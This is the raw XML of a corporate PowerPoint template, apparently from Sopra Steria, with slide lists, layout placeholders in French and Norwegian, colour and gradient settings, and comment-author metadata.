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784" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId33"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="2145705832" r:id="rId7"/>
    <p:sldId id="1713476333" r:id="rId8"/>
    <p:sldId id="2145705834" r:id="rId9"/>
    <p:sldId id="2145705835" r:id="rId10"/>
    <p:sldId id="1713476346" r:id="rId11"/>
    <p:sldId id="1713476390" r:id="rId12"/>
    <p:sldId id="1713476382" r:id="rId13"/>
    <p:sldId id="1713476378" r:id="rId14"/>
    <p:sldId id="1713476368" r:id="rId15"/>
    <p:sldId id="1713476383" r:id="rId16"/>
    <p:sldId id="1713476412" r:id="rId17"/>
    <p:sldId id="322" r:id="rId18"/>
    <p:sldId id="1713476392" r:id="rId19"/>
    <p:sldId id="1713476393" r:id="rId20"/>
    <p:sldId id="1713476394" r:id="rId21"/>
    <p:sldId id="2145705839" r:id="rId22"/>
    <p:sldId id="2145705836" r:id="rId23"/>
    <p:sldId id="1713476351" r:id="rId24"/>
    <p:sldId id="624" r:id="rId25"/>
    <p:sldId id="2145705844" r:id="rId26"/>
    <p:sldId id="1713476352" r:id="rId27"/>
    <p:sldId id="2145705837" r:id="rId28"/>
    <p:sldId id="2145705842" r:id="rId29"/>
    <p:sldId id="2145705843" r:id="rId30"/>
    <p:sldId id="2145705845" r:id="rId31"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="9944100" cy="68056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7208448-1990-44E7-9A8F-46D93A6A31F8}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="2145705832"/>
            <p14:sldId id="1713476333"/>
            <p14:sldId id="2145705834"/>
            <p14:sldId id="2145705835"/>
            <p14:sldId id="1713476346"/>
            <p14:sldId id="1713476390"/>
            <p14:sldId id="1713476382"/>
            <p14:sldId id="1713476378"/>
            <p14:sldId id="1713476368"/>
            <p14:sldId id="1713476383"/>
            <p14:sldId id="1713476412"/>
            <p14:sldId id="322"/>
            <p14:sldId id="1713476392"/>
            <p14:sldId id="1713476393"/>
            <p14:sldId id="1713476394"/>
            <p14:sldId id="2145705839"/>
            <p14:sldId id="2145705836"/>
            <p14:sldId id="1713476351"/>
            <p14:sldId id="624"/>
            <p14:sldId id="2145705844"/>
            <p14:sldId id="1713476352"/>
            <p14:sldId id="2145705837"/>
            <p14:sldId id="2145705842"/>
            <p14:sldId id="2145705843"/>
            <p14:sldId id="214570584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IA Elena" initials="DE" lastIdx="4" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::elena.daia@soprasteria.com::3bb900df-93ff-42cd-8b57-b5fb2fe19457" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="SANDBU Marius" initials="SM" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="SANDBU Mariu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1B39"/>
    <a:srgbClr val="0070C0"/>
    <a:srgbClr val="10293A"/>
    <a:srgbClr val="2D87BF"/>
    <a:srgbClr val="2E75B0"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="007AC2"/>
    <a:srgbClr val="7F7F7F"/>
    <a:srgbClr val="A7A7A7"/>
    <a:srgbClr val="4A4A4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8E0D77-27F2-4DBC-8B0F-B2B9D5853947}" v="511" dt="2023-03-24T08:42:41.411"/>
    <p1510:client id="{55B84D4E-F55E-40F9-8758-2367AA2EC572}" v="529" dt="2023-03-23T21:08:18.0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7" d="100"/>
          <a:sy n="147" d="100"/>
        </p:scale>
        <p:origin x="69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5/10/relationships/revisionInfo" Target="revisionInfo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2F909176-B8EA-41DD-8F92-1C989DF343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9110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/>
              <a:t>Sopra Steria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DC9821C-F7AD-4360-B041-FD7C83E5731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5632689" y="0"/>
            <a:ext cx="4309110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9990E-EF74-4690-9C49-66B753ABCBE5}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/03/2023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B8CF8D4-1618-452C-887D-A91AC8FC95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1" y="6464152"/>
            <a:ext cx="4309110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/>
              <a:t>Intitulé du document - Sopra Steria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C10792-DA87-4BDA-BA6B-D87502BBBF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632689" y="6464152"/>
            <a:ext cx="4309110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FA86D7-3F34-4350-90B7-F3AF3732A64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8581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8.png>
</file>

<file path=ppt/media/image3.png>
</file>

<file path=ppt/media/image30.png>
</file>

<file path=ppt/media/image38.png>
</file>

<file path=ppt/media/image39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9110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/>
              <a:t>Sopra Steria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632689" y="0"/>
            <a:ext cx="4309110" cy="3414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A15751-71F6-48FA-9E72-AC2A9C8346A7}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/03/2023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930525" y="850900"/>
            <a:ext cx="4083050" cy="22971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994411" y="3275201"/>
            <a:ext cx="7955279" cy="267971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1" y="6464152"/>
            <a:ext cx="4309110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FR"/>
              <a:t>Intitulé du document - Sopra Steria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632689" y="6464152"/>
            <a:ext cx="4309110" cy="3414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9E83D-10BD-4912-838C-C14C2B9472B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6144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96835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0508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0715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28075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5816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3773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29304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8755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7423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99E83D-10BD-4912-838C-C14C2B9472B3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437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0" y="-8018"/>
            <a:ext cx="11493284" cy="5563910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lin ang="0" scaled="1"/>
            <a:tileRect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C5EE01-F973-4120-91B8-34CAA765DB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AEA671-FC71-4FFA-B81F-CABE73D6E49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A1B2A6-1E2B-4B3B-AA5D-56BB2A0899D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2449864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kst grå bakgrun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9F7ADCB2-0352-46F1-AE02-B38AE618674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0057" b="33653"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="-1668" y="0"/>
            <a:ext cx="12193113" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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nb-NO" noProof="0"/>
              <a:t>Tittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7094BAA-B061-4033-A5AA-F1C3D20765E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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CE01E7-48C4-4553-86FC-DE382D811F33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314C82F-96D2-4806-8AC2-E48ACB55A890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2E0E9D1C-1B1C-495F-9CB1-46189C605E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0"/>
            <a:ext cx="10749412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3839027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8FFD78F-3CC7-6E41-B0B4-359C3FDFBCB1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02A189"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="95C11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C45F250A-3DDA-4643-906D-DACD57A754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6E543D07-988E-4A71-AF18-0CBC792DCB9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9ED4BBA5-A619-4C05-A053-25AFDF196F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1483608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0B81C7EF-6161-2642-B223-5DDF6F7C14AD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8C1D82"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E9559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5C4A6542-D82D-43FE-B730-A569349EB6E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339CC4FF-640D-4748-A8BC-0B73C3BAA1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DE7C281-B86E-4C39-B82C-E4B993F86F9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28322190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8435D6C-B172-324B-A093-47714ED4F479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2956628" y="-2973269"/>
            <a:ext cx="5565037" cy="11493284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="50000">
                <a:srgbClr val="007BC2"/>
              </a:gs>
              <a:gs pos="99000">
                <a:srgbClr val="30ACC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0B0C77F6-E4AE-4496-B76D-D2AF8FFF1815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C971D943-B134-4318-8C0F-D5D21E39A71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5" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B6419D0-81F5-4D3C-8F23-E6DEA26AFBE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6F50CB5C-6110-448D-869F-23DC97C1251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39243682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figu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man, colorful, young, street&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D57987-DB19-9546-B209-98C26CCD19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1494800" cy="5556626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C3341275-B9E7-4396-819A-0B80BEAE895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4" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2373D8D3-F684-4E17-911B-6F15FE34322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16E58862-16D6-49AD-BD74-EA0E25B44EB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C961300-7F4C-F34F-A7CB-6B9E0EC9EE41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0231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ball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26CD13D-A7D3-8943-8561-B8AF0AC81A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0160" y="-10160"/>
            <a:ext cx="11493283" cy="5555892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln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5" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39D86390-607A-4364-A878-710892DFF9F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F42E55AC-2CA6-478C-BDD7-82B7C221D6B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8F992C8B-9849-4870-BF02-0B43D60FFA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34DFC3A-91F7-7040-8E65-409743CA06DC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022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d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71C989-48AC-BF43-BBEA-54615DE72F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60"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="11485790" cy="5565038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697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4" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197EC8D9-95B2-7549-B86E-2AD4A229809B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6096001" cy="5565038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="63000">
                <a:srgbClr val="5C5C5C">
                  <a:alpha val="34000"/>
                </a:srgb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E0874E-2CF2-B147-B174-136FD98ED3E0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25000" lnSpcReduction="20000"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BE649CA2-69A8-534B-B749-8A76FF40FC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FE5234F0-8CF2-4689-90B9-6B8A6F8DB19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DBE3D409-AEAC-41DA-90A1-82D79228DD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17555985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a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661BE3-EA69-5643-89BA-C3C21B180E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070"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="11485790" cy="5568902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8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80EF69-173E-894B-B891-6DB6EE315A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EBC12D68-5729-E44D-9CD3-14320265FC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="6151418" cy="5565337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="75000">
                <a:srgbClr val="5C5C5C">
                  <a:alpha val="20000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="40000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/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nb-NO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5EC9CF-F613-874E-9E82-D428EF875FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756000" y="3219017"/>
            <a:ext cx="720000" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2"/>
              </a:gs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250ACA70-FC69-A047-ACF3-2F14128543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38" y="788400"/>
            <a:ext cx="6120000" cy="1980000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC3D078-F972-49F3-83E1-4B5E679462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A3C490BB-E324-477E-A697-1E43951C08E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8465141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Espace réservé pour une image  2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCE75D2-6C84-4F8F-9300-67E0175D0690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0" y="0"/>
            <a:ext cx="11473200" cy="5417345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0C5EE01-F973-4120-91B8-34CAA765DB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15853"/>
            <a:ext cx="5372100" cy="5433197"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="90000">
                <a:srgbClr val="5C5C5C">
                  <a:alpha val="17000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="36000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="44000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="30000"/>
                  <a:lumOff val="70000"/>
                  <a:alpha val="11000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="720000" bIns="2628000" anchor="b"/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Sett inn tittel på presentasjon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Connecteur droit 17"/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ZoneTexte 19"/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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Connecteur droit 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF24AFE-FBAB-41D2-A417-422A4E08E341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719138" y="3233737"/>
            <a:ext cx="72151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3E0534C-88A8-4062-B974-97E13715495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74154" y="6064776"/>
            <a:ext cx="2319130" cy="295227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726D5BFD-9D2E-4387-BD1C-795EEF816192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D3EB1F4-7F19-42AA-A59B-9FD433795D43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Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35202595-7704-435E-A83A-BB1204CB3EF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3785955"/>
            <a:ext cx="43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1DE50DC-B6F4-48C3-948E-6F3C6C28EC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4113588"/>
            <a:ext cx="43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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32455120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 sett inn bilde b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1"/>
            <a:ext cx="12191999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2" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6665D20-3F31-4A31-A265-30321D0FA87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" y="3363686"/>
            <a:ext cx="12191998" cy="2741913"/>
          </a:xfrm>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="36000">
                <a:srgbClr val="252525">
                  <a:alpha val="31000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="720000" tIns="864000" rIns="0" bIns="1332000" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/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/>
              <a:t>Sett inn tittel på presentasjon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AC1A6883-4C96-4433-97A7-0D5DD3804542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EF060F-8B3D-4E82-9076-E72DDF1B7E3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D063A181-2FD9-4F9B-9D94-41743E35AAF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138" y="5382832"/>
            <a:ext cx="6120000" cy="30364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xx.xx.xxxx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067770CD-D7F0-4DAD-B500-7CE55BDF1CD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19138" y="5055201"/>
            <a:ext cx="6120000" cy="303643"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1400" b="0" cap="none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b-NO" noProof="0"/>
              <a:t>Navn/Undertittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connecteur droit 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767CF56A-4BA7-4B67-8FB5-0D941D4B8A9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ZoneTexte 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78761EC-C067-4D3C-84DB-817AB0248037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2249692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4A9F7-26C5-4694-A296-7076D5CEB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0"/>
            <a:ext cx="10749412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30B3B81-CB18-49F2-A0E3-637EFF665D9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F4AE-C967-4346-99C5-1B876420959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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23581613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-8019"/>
            <a:ext cx="12192000" cy="6113615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37502" y="1523766"/>
            <a:ext cx="10753200" cy="60961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CD24ADA-4EC4-4D0D-9A45-04018346B8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7502" y="2180165"/>
            <a:ext cx="10753200" cy="611523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7" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DC529F-0935-48DF-BEAC-4AE83F94E0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502" y="2824820"/>
            <a:ext cx="10753200" cy="612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9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0D3D75-8DB2-4B18-9B7D-73BAF2D0D5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7502" y="3469952"/>
            <a:ext cx="10753200" cy="61199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E5DDF2DF-5619-4DC5-A488-D73DA10050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37502" y="4115083"/>
            <a:ext cx="10753200" cy="617239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3" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E77CF1-DFAE-450B-87C3-BACBCFD912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37502" y="4751804"/>
            <a:ext cx="10753200" cy="612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500" b="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63719-72E0-4526-B466-31D06C686F9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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22866996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sett inn bilde b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DD0F66AD-774F-4391-8C02-EF5505897EA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0" y="0"/>
            <a:ext cx="12192000" cy="6105596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 sz="1400" b="0"/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4228B35-E084-BA4E-A056-A46717D7E6FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5720156" cy="610559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41000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="45000"/>
                  <a:lumOff val="55000"/>
                  <a:alpha val="29000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:alpha val="67000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="10800000" scaled="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1" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425E13D3-6E30-4B29-B200-2DBCEE20DC0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7722" y="1523766"/>
            <a:ext cx="4995120" cy="60961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2" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A927644-E382-4E89-8788-947F9A4918F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7722" y="2180165"/>
            <a:ext cx="4995120" cy="611523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3" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395D4048-0A21-4B41-8A37-EA4AD38923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7722" y="2824820"/>
            <a:ext cx="4995120" cy="612000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4" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23E40EA-55AC-461C-92C9-CAB8E47C91D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722" y="3469952"/>
            <a:ext cx="4995120" cy="61199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35" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E1A1B9-B35C-473C-98B3-F8E96854804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7722" y="4115083"/>
            <a:ext cx="4995120" cy="61723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8C2E0A80-AF03-479D-8353-D8C4DD9AD6E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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF9D8F9-48B8-40F1-9EE9-E7357FCB114E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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A27477-3306-914E-B9E3-7549E41C640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7722" y="4765454"/>
            <a:ext cx="4995120" cy="617239"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="1432800" anchor="ctr" anchorCtr="0"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18pt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284B1BC-0825-4C14-94DB-64EFD8F5364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0" y="0"/>
            <a:ext cx="12192000" cy="1476986"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="89000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="6000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="4000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="31000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="1404000" tIns="738000"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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39654424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FEAB8EB-B209-4FA7-8450-E4FE2B90369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2">
                    <a:lumMod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136" y="1826419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CD24ADA-4EC4-4D0D-9A45-04018346B89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9136" y="2490788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7" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DC529F-0935-48DF-BEAC-4AE83F94E0F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9136" y="3155157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19" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0D3D75-8DB2-4B18-9B7D-73BAF2D0D5D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136" y="3819526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E5DDF2DF-5619-4DC5-A488-D73DA10050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19136" y="4483895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3" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E77CF1-DFAE-450B-87C3-BACBCFD912D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19136" y="5148262"/>
            <a:ext cx="5674685" cy="524679"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0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15pt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé pour une image  2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6308D7D9-6833-45E5-89E1-E5B5B2F4792C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6788894" y="1410981"/>
            <a:ext cx="4680000" cy="4680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EF1F1A8F-5886-40E2-BAF3-7415B3B5C3F9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0E9E3B-3623-4E38-84FB-233B291CDF35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EFE961A1-22B8-4E64-858D-60386914E5ED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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE87996-07CF-4F93-AF67-0805204320F9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314695172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kule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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-8019"/>
            <a:ext cx="12192000" cy="6113615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24" name="ZoneTexte 23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63719-72E0-4526-B466-31D06C686F9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826" y="735433"/>
            <a:ext cx="10753200" cy="547200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3000" b="1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nb-NO" noProof="0"/>
